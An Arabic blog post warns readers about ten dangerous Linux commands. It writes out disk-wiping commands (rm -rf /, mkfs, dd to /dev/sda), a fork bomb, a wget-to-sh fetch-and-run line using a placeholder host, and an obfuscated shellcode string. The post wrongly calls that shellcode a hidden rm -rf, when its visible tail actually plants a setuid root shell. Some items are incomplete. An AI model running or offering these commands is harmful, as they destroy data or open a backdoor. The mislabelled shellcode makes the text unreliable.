04/09/2016

عشر أوامر الأكثر خطورة - لا يجب عليك أبدا تنفيذها على نظام لينكس

سطر الأوامر لينكس مفيدة ومثيرة للاهتمام ولكن في بعض الأحيان قد تكون في غاية الخطورة كثيرا خاصة عندما كنت غير متأكد بما تقومون به. نحن نريد فقط أن نجعلك تدرك بعض الأوامر التي يجب عليك التفكير مرتين قبل أن تقوم بتنفيدها.


1. rm -rf 

هي واحدة من أسرع طريقة لحذف مجلد ومحتوياته. ولكن القليل من الخطأ المطبعي أو 
 الجهل قد يؤدي إلى تلف الجهاز غير قابل للاسترداد


rm command in Linux is used to delete files
rm -r command deletes the folder recursively, even the empty folder
rm -f command removes ‘Read only File’ without asking
rm -rf / : Force deletion of everything in root directory
rm -rf * : Force deletion of everything in current directory/working directory
rm -rf . : Force deletion of current folder and sub folders

2. :(){:|:&};:


ما سبق هو في الواقع fork bomb. وهو يعمل عن طريق تحديد وظيفة تسمى ':'، إنها تحافظ على تنفيذ مرارا وتكرارا حتى يتجمد النظام

3. /dev/sda

يكتب الأمر أعلاه إخراج 'الأمر' على  مسار/dev/sda. يكتب الأمر أعلاه
مما يؤدي إلى فقدان تام للبيانات على مسار/dev/sda.

4. mv folder /dev/null

والأمر أعلاه يغير مسار'مجلد' إلي  /dev/null. في لينكس  /dev/null  والتي تعني حرفيا كل شيء تم ارساله الى ثقب أسود (خالية).
#mv /home/user/* /dev/null
5. wget http://malicious_source -O- | sh


والأمر أعلاه يقوم بتحميل برنامج نصي من مصدر خبيث ومن ثم تنفيذ ذلك


6. mkfs.ext3 /dev/sda

بعد تنفيذ الأمر أعلاه الخاص (القرص الصلب) فإ
نها تكون جديدة من دون أي بيانات، وتركها غير قابل للاسترداد.

7. > file

يتم استخدام الأمر أعلاه لطرد محتويات الملف. إذا تم تنفيذ الأمر المذكور أعلاه مع الخطأ المطبعي أو الجهل مثل " xt.conf <" سوف نقوم يإعداد ملف تكوين أو أي نظام آخر جديد


8. ^foo^bar



9. dd if=/dev/random of=/dev/sda

والأمر أعلاه تقضي على مسار /dev/sda وكتابة البيانات غير المرغوب فيه عشوائي للمسار بالتاكيد! سوف يترك النظام الخاص بك في مرحلة غير متناسقة وغير قابل للاسترداد.

10. Hidden the Command


الأمر أدناه ليس إلا الأمر الأول أعلاه (rm -rf). هنا هي رموز مشفرة بحيث قد ينخدع مستخدم جاهل.

يعرض هذا الأمر هنا أن التهديد قد تكون مخفية ولا يمكن كشفها عادة في بعض الأحيان. يجب أن تكون على علم بما تقومون به، وماذا ستكون النتيجة. لا تجميع / رموز تشغيلها من مصدر غير معروف.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;


ملاحظة: لا يتم تنفيذ أي من الأمر المذكور أعلاه في واجهة اللينكس الخاص بك وذلك بسبب تنفيذ الأمر أعلاه يؤذي إلي كسر النظام الخاص بك و فقدان البيانات 

إذا كنت تعرف أي من هذه الأوامر لينكس الخطرة الأخرى، وكنت تريد منا أن تضيف إلى القائمة، من فضلك قل لنا عن طريق قسم التعليق و لا تنس لنا إعطاء ملاحظات ذات قيمة خاصة منك.